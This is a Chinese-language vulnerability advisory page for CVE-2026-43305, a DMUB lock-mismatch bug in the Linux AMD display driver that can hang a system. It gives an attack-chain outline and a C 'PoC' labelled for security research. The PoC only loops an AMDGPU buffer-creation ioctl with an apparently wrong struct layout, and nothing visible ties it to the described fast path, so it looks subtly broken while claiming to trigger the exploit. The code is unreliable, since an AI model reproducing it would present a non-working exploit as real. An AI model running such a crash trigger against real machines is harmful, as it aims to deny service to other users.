CVE-2026-43305 CVSS 5.5 中危

CVE-2026-43305 Linux内核AMD显卡驱动锁不匹配漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43305

漏洞类型

逻辑错误

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核drm/amd/display组件存在逻辑漏洞。在HWSS快路径处理过程中，用于判断是否获取DMUB硬件锁的条件与解锁时的判断条件存在不一致。当在不支持FAMS的ASIC上使用快路径时，这种不匹配会导致锁状态异常，进而引发系统挂起。该漏洞需要本地低权限即可触发，主要影响系统的可用性，可能导致拒绝服务。

技术细节

该漏洞源于Linux内核AMD显示驱动（DRM）中硬件序列（HWSS）快路径的实现缺陷。具体而言，代码在决定是否获取并使用DMUB硬件锁时，使用了一套评估逻辑，但在后续执行解锁操作时，却采用了不同的判断条件。这种锁状态管理上的严重逻辑错误，导致在特定硬件环境（即不支持FAMS功能的ASIC）下，锁可能被错误地持有或无法释放，从而有效地破坏了正常的同步机制。攻击者利用此漏洞需具备本地低权限账户，通过执行特定的图形渲染或显示配置操作触发该快路径，可导致系统死锁或完全挂起，造成拒绝服务。虽然该漏洞无法直接窃取数据或提升权限，但能有效破坏系统可用性。

攻击链分析

STEP 1

步骤1

攻击者获得对目标Linux系统的本地访问权限，并拥有低权限用户账户。

STEP 2

步骤2

攻击者执行特定的图形渲染程序或代码，调用drm/amd/display驱动的接口。

STEP 3

步骤3

驱动程序进入HWSS快路径，由于锁判断逻辑错误，在不支持FAMS的ASIC上未能正确释放DMUB硬件锁。

STEP 4

步骤4

系统发生死锁或挂起，导致拒绝服务，系统可用性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43305
 * This code attempts to trigger the HWSS fast path mismatch
 * by performing display operations on an affected AMD GPU.
 * Note: This is a conceptual trigger and requires specific hardware.
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define DRM_AMDGPU_GEM_CREATE 0x00
#define DRM_AMDGPU_CS 0x04
#define DRM_IOCTL_AMDGPU_GEM_CREATE _IOWR(0x64, DRM_AMDGPU_GEM_CREATE, struct drm_amdgpu_gem_create)

struct drm_amdgpu_gem_create {
    __u64 bo_size;
    __u32 alignment;
    __u32 domains;
};

int main() {
    int fd = open("/dev/dri/renderD128", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    struct drm_amdgpu_gem_create create = {0};
    create.bo_size = 4096;
    create.domains = 2; // GTT domain

    // Rapidly triggering display operations to hit the fast path
    for(int i = 0; i < 1000; i++) {
        if (ioctl(fd, DRM_IOCTL_AMDGPU_GEM_CREATE, &create) != 0) {
            perror("IOCTL failed");
            break;
        }
    }

    close(fd);
    printf("Exploit triggered. System may hang if vulnerable.\n");
    return 0;
}

影响范围

Linux Kernel (修复前的特定版本)

防御指南

临时缓解措施

建议立即更新Linux内核至修复该漏洞的版本。若暂时无法更新，应严格限制本地用户的访问权限，防止恶意用户利用此漏洞导致系统崩溃。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表